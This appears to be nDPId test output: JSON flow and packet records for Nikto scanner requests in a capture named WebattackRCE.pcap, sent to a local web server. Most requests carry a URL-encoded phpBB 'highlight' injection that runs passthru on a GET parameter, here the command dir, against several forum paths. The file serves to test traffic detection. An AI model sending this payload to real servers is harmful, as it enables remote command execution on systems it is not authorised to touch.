-01214{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":648,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":648,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277741,"flow_last_seen":1576420277741,"flow_idle_time":7440000,"flow_min_l4_payload_len":297,"flow_max_l4_payload_len":297,"flow_tot_l4_payload_len":297,"flow_avg_l4_payload_len":297,"midstream":1,"thread_ts_msec":1576420277741,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50858,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/index.php?name=Forums&file=viewtopic&t=2&rush=%64%69%72&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5f%47%45%54%5f%56%41%52%53%5b%72%75%73%68%5d%29.%2527","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001388)"}} -00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":649,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":649,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277743,"flow_last_seen":1576420277743,"flow_idle_time":7440000,"flow_min_l4_payload_len":274,"flow_max_l4_payload_len":274,"flow_tot_l4_payload_len":274,"flow_avg_l4_payload_len":274,"midstream":1,"thread_ts_msec":1576420277743,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50860,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00847{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":649,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":649,"flow_packet_id":1,"flow_last_seen":1576420277743,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":340,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":340,"pkt_l4_len":306,"thread_ts_msec":1576420277743,"pkt":"AAAAAAAAAAAAAAAACABFAAFGAG5AAEAGO0J\/AAABfwAAAcasH5AOKDl4jiUqhYAYAED\/OgAAAQEICp1m\/xedZv8XR0VUIC92aWV3dG9waWMucGhwP3Q9MiZydXNoPSU2NCU2OSU3MiZoaWdobGlnaHQ9JTI1MjcuJTcwJTYxJTczJTczJTc0JTY4JTcyJTc1JTI4JTI0JTQ4JTU0JTU0JTUwJTVmJTQ3JTQ1JTU0JTVmJTU2JTQxJTUyJTUzJTViJTcyJTc1JTczJTY4JTVkJTI5LiUyNTI3IEhUVFAvMS4xDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6MDAxMzg5KQ0KSG9zdDogMTI3LjAuMC4xDQoNCg=="} -01191{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":649,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":649,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277743,"flow_last_seen":1576420277743,"flow_idle_time":7440000,"flow_min_l4_payload_len":274,"flow_max_l4_payload_len":274,"flow_tot_l4_payload_len":274,"flow_avg_l4_payload_len":274,"midstream":1,"thread_ts_msec":1576420277743,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50860,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/viewtopic.php?t=2&rush=%64%69%72&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5f%47%45%54%5f%56%41%52%53%5b%72%75%73%68%5d%29.%2527","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001389)"}} -00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":650,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":650,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277745,"flow_last_seen":1576420277745,"flow_idle_time":7440000,"flow_min_l4_payload_len":297,"flow_max_l4_payload_len":297,"flow_tot_l4_payload_len":297,"flow_avg_l4_payload_len":297,"midstream":1,"thread_ts_msec":1576420277745,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50862,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00877{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":650,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":650,"flow_packet_id":1,"flow_last_seen":1576420277745,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":363,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":363,"pkt_l4_len":329,"thread_ts_msec":1576420277745,"pkt":"AAAAAAAAAAAAAAAACABFAAFddiRAAEAGxXR\/AAABfwAAAcauH5DeiE8\/TEH5WoAYAED\/UQAAAQEICp1m\/xmdZv8ZR0VUIC9pbmRleC5waHA\/bmFtZT1Gb3J1bXMmZmlsZT12aWV3dG9waWMmdD0yJnJ1c2g9JTY0JTY5JTcyJmhpZ2hsaWdodD0lMjUyNy4lNzAlNjElNzMlNzMlNzQlNjglNzIlNzUlMjglMjQlNDglNTQlNTQlNTAlNWYlNDclNDUlNTQlNWYlNTYlNDElNTIlNTMlNWIlNzIlNzUlNzMlNjglNWQlMjkuJTI1MjcgSFRUUC8xLjENCkhvc3Q6IDEyNy4wLjAuMQ0KVXNlci1BZ2VudDogTW96aWxsYS81LjAwIChOaWt0by8yLjEuNikgKEV2YXNpb25zOk5vbmUpIChUZXN0OjAwMTM5MCkNCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNCg0K"} -01214{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":650,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":650,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277745,"flow_last_seen":1576420277745,"flow_idle_time":7440000,"flow_min_l4_payload_len":297,"flow_max_l4_payload_len":297,"flow_tot_l4_payload_len":297,"flow_avg_l4_payload_len":297,"midstream":1,"thread_ts_msec":1576420277745,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50862,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/index.php?name=Forums&file=viewtopic&t=2&rush=%64%69%72&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5f%47%45%54%5f%56%41%52%53%5b%72%75%73%68%5d%29.%2527","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001390)"}} -00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":651,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":651,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277746,"flow_last_seen":1576420277746,"flow_idle_time":7440000,"flow_min_l4_payload_len":306,"flow_max_l4_payload_len":306,"flow_tot_l4_payload_len":306,"flow_avg_l4_payload_len":306,"midstream":1,"thread_ts_msec":1576420277746,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50864,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00888{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":651,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":651,"flow_packet_id":1,"flow_last_seen":1576420277746,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":372,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":372,"pkt_l4_len":338,"thread_ts_msec":1576420277746,"pkt":"AAAAAAAAAAAAAAAACABFAAFmjyxAAEAGrGN\/AAABfwAAAcawH5C1dLY3dpi6dIAYAED\/WgAAAQEICp1m\/xqdZv8aR0VUIC9wb3N0bnVrZS9pbmRleC5waHA\/bmFtZT1Gb3J1bXMmZmlsZT12aWV3dG9waWMmdD0yJnJ1c2g9JTY0JTY5JTcyJmhpZ2hsaWdodD0lMjUyNy4lNzAlNjElNzMlNzMlNzQlNjglNzIlNzUlMjglMjQlNDglNTQlNTQlNTAlNWYlNDclNDUlNTQlNWYlNTYlNDElNTIlNTMlNWIlNzIlNzUlNzMlNjglNWQlMjkuJTI1MjcgSFRUUC8xLjENClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDowMDEzOTApDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQpIb3N0OiAxMjcuMC4wLjENCg0K"} -01224{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":651,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":651,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277746,"flow_last_seen":1576420277746,"flow_idle_time":7440000,"flow_min_l4_payload_len":306,"flow_max_l4_payload_len":306,"flow_tot_l4_payload_len":306,"flow_avg_l4_payload_len":306,"midstream":1,"thread_ts_msec":1576420277746,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50864,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/postnuke\/index.php?name=Forums&file=viewtopic&t=2&rush=%64%69%72&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5f%47%45%54%5f%56%41%52%53%5b%72%75%73%68%5d%29.%2527","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001390)"}} -00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":652,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":652,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277747,"flow_last_seen":1576420277747,"flow_idle_time":7440000,"flow_min_l4_payload_len":311,"flow_max_l4_payload_len":311,"flow_tot_l4_payload_len":311,"flow_avg_l4_payload_len":311,"midstream":1,"thread_ts_msec":1576420277747,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50866,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00895{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":652,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":652,"flow_packet_id":1,"flow_last_seen":1576420277747,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":377,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":377,"pkt_l4_len":343,"thread_ts_msec":1576420277747,"pkt":"AAAAAAAAAAAAAAAACABFAAFrmeBAAEAGoap\/AAABfwAAAcayH5AmkqDEx1CXDIAYAED\/XwAAAQEICp1m\/xudZv8bR0VUIC9wb3N0bnVrZS9odG1sL2luZGV4LnBocD9uYW1lPUZvcnVtcyZmaWxlPXZpZXd0b3BpYyZ0PTImcnVzaD0lNjQlNjklNzImaGlnaGxpZ2h0PSUyNTI3LiU3MCU2MSU3MyU3MyU3NCU2OCU3MiU3NSUyOCUyNCU0OCU1NCU1NCU1MCU1ZiU0NyU0NSU1NCU1ZiU1NiU0MSU1MiU1MyU1YiU3MiU3NSU3MyU2OCU1ZCUyOS4lMjUyNyBIVFRQLzEuMQ0KVXNlci1BZ2VudDogTW96aWxsYS81LjAwIChOaWt0by8yLjEuNikgKEV2YXNpb25zOk5vbmUpIChUZXN0OjAwMTM5MCkNCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNCkhvc3Q6IDEyNy4wLjAuMQ0KDQo="} -01230{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":652,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":652,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277747,"flow_last_seen":1576420277747,"flow_idle_time":7440000,"flow_min_l4_payload_len":311,"flow_max_l4_payload_len":311,"flow_tot_l4_payload_len":311,"flow_avg_l4_payload_len":311,"midstream":1,"thread_ts_msec":1576420277747,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50866,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/postnuke\/html\/index.php?name=Forums&file=viewtopic&t=2&rush=%64%69%72&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5f%47%45%54%5f%56%41%52%53%5b%72%75%73%68%5d%29.%2527","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001390)"}} -00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":653,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":653,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277749,"flow_last_seen":1576420277749,"flow_idle_time":7440000,"flow_min_l4_payload_len":305,"flow_max_l4_payload_len":305,"flow_tot_l4_payload_len":305,"flow_avg_l4_payload_len":305,"midstream":1,"thread_ts_msec":1576420277749,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50868,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00887{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":653,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":653,"flow_packet_id":1,"flow_last_seen":1576420277749,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":371,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":371,"pkt_l4_len":337,"thread_ts_msec":1576420277749,"pkt":"AAAAAAAAAAAAAAAACABFAAFlinpAAEAGsRZ\/AAABfwAAAca0H5BJbLNma4SLi4AYAED\/WQAAAQEICp1m\/x2dZv8dR0VUIC9tb2R1bGVzL2luZGV4LnBocD9uYW1lPUZvcnVtcyZmaWxlPXZpZXd0b3BpYyZ0PTImcnVzaD0lNjQlNjklNzImaGlnaGxpZ2h0PSUyNTI3LiU3MCU2MSU3MyU3MyU3NCU2OCU3MiU3NSUyOCUyNCU0OCU1NCU1NCU1MCU1ZiU0NyU0NSU1NCU1ZiU1NiU0MSU1MiU1MyU1YiU3MiU3NSU3MyU2OCU1ZCUyOS4lMjUyNyBIVFRQLzEuMQ0KSG9zdDogMTI3LjAuMC4xDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6MDAxMzkwKQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KDQo="} -01223{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":653,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":653,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277749,"flow_last_seen":1576420277749,"flow_idle_time":7440000,"flow_min_l4_payload_len":305,"flow_max_l4_payload_len":305,"flow_tot_l4_payload_len":305,"flow_avg_l4_payload_len":305,"midstream":1,"thread_ts_msec":1576420277749,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50868,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/modules\/index.php?name=Forums&file=viewtopic&t=2&rush=%64%69%72&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5f%47%45%54%5f%56%41%52%53%5b%72%75%73%68%5d%29.%2527","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001390)"}} -00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":654,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":654,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277750,"flow_last_seen":1576420277750,"flow_idle_time":7440000,"flow_min_l4_payload_len":303,"flow_max_l4_payload_len":303,"flow_tot_l4_payload_len":303,"flow_avg_l4_payload_len":303,"midstream":1,"thread_ts_msec":1576420277750,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50870,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00884{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":654,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":654,"flow_packet_id":1,"flow_last_seen":1576420277750,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":369,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":369,"pkt_l4_len":335,"thread_ts_msec":1576420277750,"pkt":"AAAAAAAAAAAAAAAACABFAAFjJWNAAEAGFjB\/AAABfwAAAca2H5CBThx9EGPplIAYAED\/VwAAAQEICp1m\/x6dZv8eR0VUIC9waHBCQi9pbmRleC5waHA\/bmFtZT1Gb3J1bXMmZmlsZT12aWV3dG9waWMmdD0yJnJ1c2g9JTY0JTY5JTcyJmhpZ2hsaWdodD0lMjUyNy4lNzAlNjElNzMlNzMlNzQlNjglNzIlNzUlMjglMjQlNDglNTQlNTQlNTAlNWYlNDclNDUlNTQlNWYlNTYlNDElNTIlNTMlNWIlNzIlNzUlNzMlNjglNWQlMjkuJTI1MjcgSFRUUC8xLjENClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDowMDEzOTApDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQpIb3N0OiAxMjcuMC4wLjENCg0K"} -01221{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":654,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":654,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277750,"flow_last_seen":1576420277750,"flow_idle_time":7440000,"flow_min_l4_payload_len":303,"flow_max_l4_payload_len":303,"flow_tot_l4_payload_len":303,"flow_avg_l4_payload_len":303,"midstream":1,"thread_ts_msec":1576420277750,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50870,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/phpBB\/index.php?name=Forums&file=viewtopic&t=2&rush=%64%69%72&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5f%47%45%54%5f%56%41%52%53%5b%72%75%73%68%5d%29.%2527","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001390)"}} -00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":655,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":655,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277752,"flow_last_seen":1576420277752,"flow_idle_time":7440000,"flow_min_l4_payload_len":303,"flow_max_l4_payload_len":303,"flow_tot_l4_payload_len":303,"flow_avg_l4_payload_len":303,"midstream":1,"thread_ts_msec":1576420277752,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50872,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00884{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":655,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":655,"flow_packet_id":1,"flow_last_seen":1576420277752,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":369,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":369,"pkt_l4_len":335,"thread_ts_msec":1576420277752,"pkt":"AAAAAAAAAAAAAAAACABFAAFjNwZAAEAGBI1\/AAABfwAAAca4H5DKtQ4b91nN3YAYAED\/VwAAAQEICp1m\/yCdZv8gR0VUIC9mb3J1bS9pbmRleC5waHA\/bmFtZT1Gb3J1bXMmZmlsZT12aWV3dG9waWMmdD0yJnJ1c2g9JTY0JTY5JTcyJmhpZ2hsaWdodD0lMjUyNy4lNzAlNjElNzMlNzMlNzQlNjglNzIlNzUlMjglMjQlNDglNTQlNTQlNTAlNWYlNDclNDUlNTQlNWYlNTYlNDElNTIlNTMlNWIlNzIlNzUlNzMlNjglNWQlMjkuJTI1MjcgSFRUUC8xLjENClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDowMDEzOTApDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQpIb3N0OiAxMjcuMC4wLjENCg0K"} -01221{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":655,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":655,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277752,"flow_last_seen":1576420277752,"flow_idle_time":7440000,"flow_min_l4_payload_len":303,"flow_max_l4_payload_len":303,"flow_tot_l4_payload_len":303,"flow_avg_l4_payload_len":303,"midstream":1,"thread_ts_msec":1576420277752,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50872,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/forum\/index.php?name=Forums&file=viewtopic&t=2&rush=%64%69%72&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5f%47%45%54%5f%56%41%52%53%5b%72%75%73%68%5d%29.%2527","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001390)"}} -00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":656,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":656,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277753,"flow_last_seen":1576420277753,"flow_idle_time":7440000,"flow_min_l4_payload_len":298,"flow_max_l4_payload_len":298,"flow_tot_l4_payload_len":298,"flow_avg_l4_payload_len":298,"midstream":1,"thread_ts_msec":1576420277753,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50874,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00880{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":656,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":656,"flow_packet_id":1,"flow_last_seen":1576420277753,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":364,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":364,"pkt_l4_len":330,"thread_ts_msec":1576420277753,"pkt":"AAAAAAAAAAAAAAAACABFAAFeFwdAAEAGJJF\/AAABfwAAAca6H5C+9y4cicj8j4AYAED\/UgAAAQEICp1m\/yGdZv8hR0VUIC9pbmRleC5waHA\/TmlrdG89Rm9ydW1zJmZpbGU9dmlld3RvcGljJnQ9MiZydXNoPSU2NCU2OSU3MiZoaWdobGlnaHQ9JTI1MjcuJTcwJTYxJTczJTczJTc0JTY4JTcyJTc1JTI4JTI0JTQ4JTU0JTU0JTUwJTVmJTQ3JTQ1JTU0JTVmJTU2JTQxJTUyJTUzJTViJTcyJTc1JTczJTY4JTVkJTI5LiUyNTI3IEhUVFAvMS4xDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6MDAxMzkwKQ0KSG9zdDogMTI3LjAuMC4xDQoNCg=="} -01215{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":656,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":656,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277753,"flow_last_seen":1576420277753,"flow_idle_time":7440000,"flow_min_l4_payload_len":298,"flow_max_l4_payload_len":298,"flow_tot_l4_payload_len":298,"flow_avg_l4_payload_len":298,"midstream":1,"thread_ts_msec":1576420277753,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50874,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/index.php?Nikto=Forums&file=viewtopic&t=2&rush=%64%69%72&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5f%47%45%54%5f%56%41%52%53%5b%72%75%73%68%5d%29.%2527","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001390)"}} -00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":657,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":657,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277754,"flow_last_seen":1576420277754,"flow_idle_time":7440000,"flow_min_l4_payload_len":307,"flow_max_l4_payload_len":307,"flow_tot_l4_payload_len":307,"flow_avg_l4_payload_len":307,"midstream":1,"thread_ts_msec":1576420277754,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50876,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00892{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":657,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":657,"flow_packet_id":1,"flow_last_seen":1576420277754,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":373,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":373,"pkt_l4_len":339,"thread_ts_msec":1576420277754,"pkt":"AAAAAAAAAAAAAAAACABFAAFnn4NAAEAGnAt\/AAABfwAAAca8H5BO76agHBQLN4AYAED\/WwAAAQEICp1m\/yKdZv8iR0VUIC9wb3N0bnVrZS9pbmRleC5waHA\/TmlrdG89Rm9ydW1zJmZpbGU9dmlld3RvcGljJnQ9MiZydXNoPSU2NCU2OSU3MiZoaWdobGlnaHQ9JTI1MjcuJTcwJTYxJTczJTczJTc0JTY4JTcyJTc1JTI4JTI0JTQ4JTU0JTU0JTUwJTVmJTQ3JTQ1JTU0JTVmJTU2JTQxJTUyJTUzJTViJTcyJTc1JTczJTY4JTVkJTI5LiUyNTI3IEhUVFAvMS4xDQpIb3N0OiAxMjcuMC4wLjENCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDowMDEzOTAp